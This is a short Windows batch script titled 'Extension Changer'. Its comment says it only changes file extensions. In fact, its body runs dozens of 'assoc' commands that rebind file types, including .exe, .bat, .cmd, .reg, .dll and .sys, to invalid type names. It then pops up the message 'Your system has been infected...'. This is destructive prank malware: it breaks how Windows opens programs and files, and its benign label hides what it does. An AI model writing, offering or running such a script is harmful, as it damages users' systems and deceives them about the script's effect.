@echo off
title Extension Changer
C:
color a
REM This script changes the file extensions on your system

@echo off
assoc .txt=text
assoc .exe=executable
assoc .jpeg=jpegfile
assoc .png=pngfile
assoc .mpeg=mpegfile
assoc .sys=system
assoc .dll=dllfile
assoc .doc=word
assoc .docx=word
assoc .xls=excel
assoc .xlsx=excel
assoc .ppt=pptfile
assoc .pptx=pptfile
assoc .pdf=pdf
assoc .zip=zip
assoc .rar=rar
assoc .7z=7z
assoc .mp3=mp3file
assoc .mp4=mp4file
assoc .avi=avifile
assoc .mkv=mkvfile
assoc .mov=movfile
assoc .flv=flvfile
assoc .wmv=wmvfile
assoc .wav=wave
assoc .wma=wmafile
assoc .ogg=oggfile
assoc .aac=aacfile
assoc .flac=flacfile
assoc .m4a=m4afile
assoc .txt=text
assoc .rtf=rtffile
assoc .html=htmlfile
assoc .css=cssfile
assoc .js=jsfile
assoc .php=phpfile
assoc .asp=aspfile
assoc .aspx=aspxfile
assoc .xml=xmlfile
assoc .json=jsonfile
assoc .csv=csvfile
assoc .sql=sqlfile
assoc .java=javafile
assoc .c=cfile
assoc .cpp=cppfile
assoc .h=hfile
assoc .hpp=hppfile
assoc .cs=csfile
assoc .vb=vbfile
assoc .py=pyfile
assoc .pl=plfile
assoc .rb=rbfile
assoc .sh=shfile
assoc .bat=batfile
assoc .cmd=cmdfile
assoc .ps1=ps1file
assoc .vbs=vbsfile
assoc .reg=regfile
assoc .ini=inifile
assoc .conf=conffile
assoc .cfg=cfgfile
assoc .log=logfile
assoc .bak=bakfile
assoc .tmp=tmpfile
assoc .temp=tempfile
assoc .db=dbfile
assoc .mdb=mdbfile
assoc .accdb=accdbfile
assoc .sqlitedb=sqlitedbfile
assoc .dbf=dbffile
assoc .dat=datfile
assoc .bin=binfile
assoc .iso=isofile
assoc .img=imgfile
assoc .vhd=vhdfile
assoc .vhdx=vhdxfile
assoc .vmdk=vmdkfile
assoc .ova=ovafile
assoc .ovf=ovffile
assoc .tar=tarfile
assoc .gz=gzfile
assoc .bz2=bz2file
assoc .xz=xzfile
assoc .lzma=lzmafile
assoc .7z=7zfile
assoc .zip=zipfile
assoc .rar=rarfile
assoc .cab=cabfile

msg * Your system has been infected...